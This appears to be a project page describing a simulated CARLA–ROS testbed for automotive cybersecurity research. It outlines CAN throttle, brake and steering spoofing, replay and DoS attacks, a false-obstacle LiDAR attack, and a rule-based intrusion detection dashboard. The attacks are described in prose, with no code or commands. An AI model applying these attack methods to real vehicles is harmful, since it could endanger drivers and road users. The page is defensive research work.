Autonomous Vehicles · Cybersecurity · CARLA · ROS · CAN

Cybersecurity Analysis of Autonomous Vehicle CAN Networks

This project presents a CARLA–ROS virtual testbed for evaluating CAN attacks, perception attacks, intrusion detection, and the effect of manipulated vehicle control and sensor data on autonomous driving behaviour.

Key Features

  • Self-driving vehicle in CARLA
  • CAN throttle, brake, steering, replay and DoS attacks
  • Rule-based IDS with dashboard alerts
  • LiDAR-based safety controller
  • False obstacle sensor attack demonstration

Overview

Project Aim

Modern vehicles depend on internal communication networks such as the Controller Area Network (CAN). Although CAN is efficient and widely used, it lacks built-in authentication and encryption, which makes it vulnerable to spoofing, replay and denial-of-service attacks.

This project builds a virtual testbed to investigate those weaknesses in a safe and repeatable environment. CARLA is used to simulate autonomous driving, ROS manages the distributed system, SocketCAN provides a vehicle network layer, and a custom dashboard is used to trigger attacks and monitor system behaviour in real time.

What the Project Demonstrates

Direct control attacks Replay attack DoS attack Perception attack IDS alerts Dashboard monitoring CARLA + ROS integration

Architecture

System Design

Windows Host

  • CARLA simulator
  • Autonomous control script
  • Dashboard interface
  • LiDAR safety / sensor attack script

Ubuntu / ROS

  • ROS core and rosbridge
  • CAN bridge
  • Attack injection node
  • IDS and logging nodes
CARLA / Agent → Control → CAN Frames → Vehicle
         ↑                     ↑
         │                     │
   Sensor Safety Layer    CAN Attack Node
         ↑                     │
   LiDAR / Camera          IDS + Logger

Attacks

Implemented Threat Scenarios

Throttle, Brake and Steering Spoofing

These attacks inject crafted CAN messages to directly interfere with vehicle actuation. They demonstrate how malicious control commands can create conflict with normal autonomous driving behaviour.

Replay Attack

Legitimate CAN traffic is captured and can be replayed later in a different driving context. This shows how valid historical traffic can still be dangerous when reused at the wrong time.

DoS Attack

A high-rate flood of control frames targets critical CAN identifiers, creating contention with legitimate traffic and disrupting availability of the control path.

Sensor Attack

A false obstacle is inserted into LiDAR-derived perception data before it reaches the safety logic. This causes the vehicle to slow or brake even when the road is clear.

IDS

A rule-based intrusion detection system monitors CAN traffic, identifies suspicious injected frames and high-rate flooding, and displays live alerts in the dashboard.

Logging and Visualisation

Attack activity, IDS events and CAN traffic are logged and displayed live, making the system suitable for demonstration, debugging and evaluation.

Results

Key Outcomes

Control-Plane Findings

  • Injected control frames can influence throttle, steering and braking.
  • Replay can reproduce valid but contextually incorrect behaviour.
  • DoS flooding can destabilise the control path.

Perception-Plane Findings

  • LiDAR is used in a front-zone safety controller.
  • False obstacle injection can trigger unnecessary braking.
  • This demonstrates indirect interference with self-driving behaviour.
  • Sensor attacks differ from CAN attacks because they alter what the system believes.

The project highlights the difference between direct actuation attacks that manipulate vehicle commands and indirect perception attacks that influence driving decisions by falsifying environmental understanding.

Technology Stack

Tools Used

CARLA ROS Noetic SocketCAN PCAN Python PowerShell